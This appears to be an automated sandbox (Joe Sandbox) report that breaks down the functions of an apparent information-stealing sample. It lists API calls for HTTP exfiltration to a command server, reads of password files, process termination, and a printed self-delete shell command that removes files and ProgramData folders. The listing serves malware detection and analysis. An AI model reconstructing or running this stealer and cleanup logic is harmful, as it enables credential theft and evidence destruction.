                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                            • String ID: passwords.txt
                                                                            • API String ID: 3298853120-347816968
                                                                            • Opcode ID: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                            • Instruction ID: 1ecdebe3f11d8fac3e9d0efa643fe933af64b4fe52e77a22e07e9b20bef025ed
                                                                            • Opcode Fuzzy Hash: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                            • Instruction Fuzzy Hash: 98C16971800159EEDB15EBE4ED1AEEEBB75BF18304F10403AF511721E1DB782A09DB25

                                                                            Control-flow Graph

                                                                            [Control-flow graph figure not preserved; legend: Executed / Not Executed]
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00413911
                                                                              • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                              • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                              • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413ADD
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0041303A: _EH_prolog.MSVCRT ref: 0041303F
                                                                              • Part of subcall function 0041303A: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C8A
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413D0B
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413E37
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413EB8
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413FE4
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414065
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414191
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041420C
                                                                            • Sleep.KERNEL32(0000EA60), ref: 0041421B
                                                                              • Part of subcall function 00413118: _EH_prolog.MSVCRT ref: 0041311D
                                                                              • Part of subcall function 00413118: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                              • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                              • Part of subcall function 00413118: StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                              • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                              • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                            • String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                            • API String ID: 1345713276-3681523784
                                                                            • Opcode ID: 505f916443a8155cce969c46bc05582c1e74d202306969a7660cc8c93faf51c3
                                                                            • Instruction ID: ba2ef69668dbee3cc8c09a903ddfb9f5b99e769ff53e208b1ce9b21879ea8b17
                                                                            • Opcode Fuzzy Hash: 505f916443a8155cce969c46bc05582c1e74d202306969a7660cc8c93faf51c3
                                                                            • Instruction Fuzzy Hash: 596263B0904248EADB10EBE5C956BDEBBB89F19304F5041BEF445B32C1DB785B4C8766

                                                                            Control-flow Graph

                                                                            [Control-flow graph figure not preserved; legend: Executed / Not Executed]
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00403AFA
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                            • StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00425975,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404107
                                                                            • InternetCloseHandle.WININET(?), ref: 0040411C
                                                                            • InternetCloseHandle.WININET(?), ref: 00404125
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                            • String ID: !$"$"$------$------$------$build_id$hwid
                                                                            • API String ID: 1139859944-3346224549
                                                                            • Opcode ID: 6763fc035234d5979cabe930e44d953dfd0e215cef660ea1f11e82d7fcc9c962
                                                                            • Instruction ID: b0e5e0d41a604fbf99728ef0725b538a38cb0714067dfec9b32dda745c4f151e
                                                                            • Opcode Fuzzy Hash: 6763fc035234d5979cabe930e44d953dfd0e215cef660ea1f11e82d7fcc9c962
                                                                            • Instruction Fuzzy Hash: 31223AB190414CEADB11EBE4C956BEEBBB8AF18308F5041BEE50573582DB781B4CCB65
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040673C
                                                                              • Part of subcall function 0040FB28: StrCmpCA.SHLWAPI(?,?,?,00408A88,00425D7C,00000000), ref: 0040FB31
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425B78,?,?,?,00425B4E,?,00000000), ref: 004068A8
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00411056: _EH_prolog.MSVCRT ref: 0041105B
                                                                              • Part of subcall function 00411056: memset.MSVCRT ref: 0041107D
                                                                              • Part of subcall function 00411056: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                              • Part of subcall function 00411056: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                              • Part of subcall function 00411056: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406A9A
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00406AA1
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00406BBF
                                                                            • lstrcat.KERNEL32(00000000,00425B94), ref: 00406BCD
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00406BDF
                                                                            • lstrcat.KERNEL32(00000000,00425B98), ref: 00406BED
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00406D34
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00406D42
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            • memset.MSVCRT ref: 00406D9A
                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00406DBF
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 4187064601-0
                                                                            • Opcode ID: 8e1653efa4f5854faced7d70c72396407c3d3c249bef8c47c695785d4c6cb76f
                                                                            • Instruction ID: ba7657a0882041a922700d4e4b68e078784f46e31e746cb862f522f044a4a9e6
                                                                            • Opcode Fuzzy Hash: 8e1653efa4f5854faced7d70c72396407c3d3c249bef8c47c695785d4c6cb76f
                                                                            • Instruction Fuzzy Hash: 9F224771904248EEDF15EBE4DD56AEEBB75AF18308F50407EF402721D2DB782A09DB26
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040875E
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425D70,?,?,?,00425B92,00000000), ref: 00408841
                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089AE
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 004089B5
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00408AD8
                                                                            • lstrcat.KERNEL32(00000000,00425D84), ref: 00408AE6
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00408AF8
                                                                            • lstrcat.KERNEL32(00000000,00425D88), ref: 00408B06
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00408C19
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00408C27
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            • memset.MSVCRT ref: 00408C7F
                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00408CA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
                                                                            • String ID:
                                                                            • API String ID: 156379684-0
                                                                            • Opcode ID: 43e7eccc74614d8f611f5c667144751c4e0face382e07e427c529d3e51f79cf1
                                                                            • Instruction ID: 995570c1c0ce675a9085062181732195259fe43f91e974d6a0640a795ee953cc
                                                                            • Opcode Fuzzy Hash: 43e7eccc74614d8f611f5c667144751c4e0face382e07e427c529d3e51f79cf1
                                                                            • Instruction Fuzzy Hash: 3AF15771804158EADB15EBE4DD1ABEEBB74AF18308F10807EE505721E2DF782A09DB25
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00410781
                                                                            • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                            • CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?), ref: 004107C4
                                                                            • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                            • VariantInit.OLEAUT32(?), ref: 00410855
                                                                              • Part of subcall function 004106C4: _EH_prolog.MSVCRT ref: 004106C9
                                                                              • Part of subcall function 004106C4: CoCreateInstance.OLE32(00426D04,00000000,00000001,00426430,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                              • Part of subcall function 004106C4: SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                              • Part of subcall function 004106C4: _wtoi64.MSVCRT ref: 00410738
                                                                              • Part of subcall function 004106C4: SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                              • Part of subcall function 004106C4: SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 0041088D
                                                                            • GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 00410893
                                                                            • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory), ref: 004108A0
                                                                            • VariantClear.OLEAUT32(?), ref: 004108E2
                                                                            • wsprintfA.USER32 ref: 004108CC
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                            • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                            • API String ID: 2456697202-461178377
                                                                            • Opcode ID: 4c5c30e2ea9d2adf16a85c0074a720322db174524018e3eb54dc317dc257ee69
                                                                            • Instruction ID: 4b36eb2a1d5a1bedc29b67d6ed82d78b3e43d11d07795a3f045295924e426f07
                                                                            • Opcode Fuzzy Hash: 4c5c30e2ea9d2adf16a85c0074a720322db174524018e3eb54dc317dc257ee69
                                                                            • Instruction Fuzzy Hash: 63516C71A01228BBCB20DB95DC49EEFBB7CEF49B10F504116F515E6190C7B89A41CBA8
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004118B3
                                                                            • strtok_s.MSVCRT ref: 004118E4
                                                                            • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 0041197C
                                                                              • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                              • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                            • lstrcpy.KERNEL32(?,?), ref: 00411A33
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00411A6F
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00411AB6
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00411AFD
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00411B44
                                                                            • strtok_s.MSVCRT ref: 00411CA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                            • String ID: false$true
                                                                            • API String ID: 49562497-2658103896
                                                                            • Opcode ID: 59e9e0ed7abd9e5132589874edf6417603bdd11e833da19a679df8b697dbdabf
                                                                            • Instruction ID: ba927b6fbe385cdc95ceeb1740fcb97b1cf008379e2e115a61cc2516e6170599
                                                                            • Opcode Fuzzy Hash: 59e9e0ed7abd9e5132589874edf6417603bdd11e833da19a679df8b697dbdabf
                                                                            • Instruction Fuzzy Hash: B6C182B190021DAFDF10EFE4D855EDE77B9AF18304F10446AF505A3191DF78AA89CB64
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00404F2F
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                            • StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
                                                                            • InternetCloseHandle.WININET(00000000), ref: 004050DD
                                                                            • InternetCloseHandle.WININET(?), ref: 004050E6
                                                                            • InternetCloseHandle.WININET(?), ref: 004050EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                            • String ID: ERROR$ERROR$GET
                                                                            • API String ID: 2435781452-2509457195
                                                                            • Opcode ID: 517f34d15c50c2bff24b9ad49d7a6df4359f1629075331d26f3e055988320fb2
                                                                            • Instruction ID: c1fd0c265216fd47394e40449a31f27cb744319a2eff906596a5c238740c7f68
                                                                            • Opcode Fuzzy Hash: 517f34d15c50c2bff24b9ad49d7a6df4359f1629075331d26f3e055988320fb2
                                                                            • Instruction Fuzzy Hash: 93512F71900119AFEB11EBE0DC85FEFBBB9EB09744F10403AF605B2191DB795A48CBA5
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004041B7
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                                                            • StrCmpCA.SHLWAPI(?), ref: 00404238
                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404369
                                                                            • InternetCloseHandle.WININET(?), ref: 00404372
                                                                            • InternetCloseHandle.WININET(?), ref: 0040437B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                            • String ID: GET
                                                                            • API String ID: 1687531150-1805413626
                                                                            • Opcode ID: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                            • Instruction ID: 7ce3078965428967d931fab95435fba2e2eaf60a30af71eeb75a30b69647e977
                                                                            • Opcode Fuzzy Hash: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                            • Instruction Fuzzy Hash: 07516DB2900219AFDB10EFE0CC85AEEBBB9EB49344F00513AFA01B2190D7785E45CB65
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004136E8
                                                                            • memset.MSVCRT ref: 00413708
                                                                            • memset.MSVCRT ref: 00413714
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00413729
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004138B5
                                                                            • memset.MSVCRT ref: 004138C2
                                                                            • memset.MSVCRT ref: 004138D0
                                                                            • ExitProcess.KERNEL32 ref: 004138E1
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                            • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                            • API String ID: 1312519015-206210831
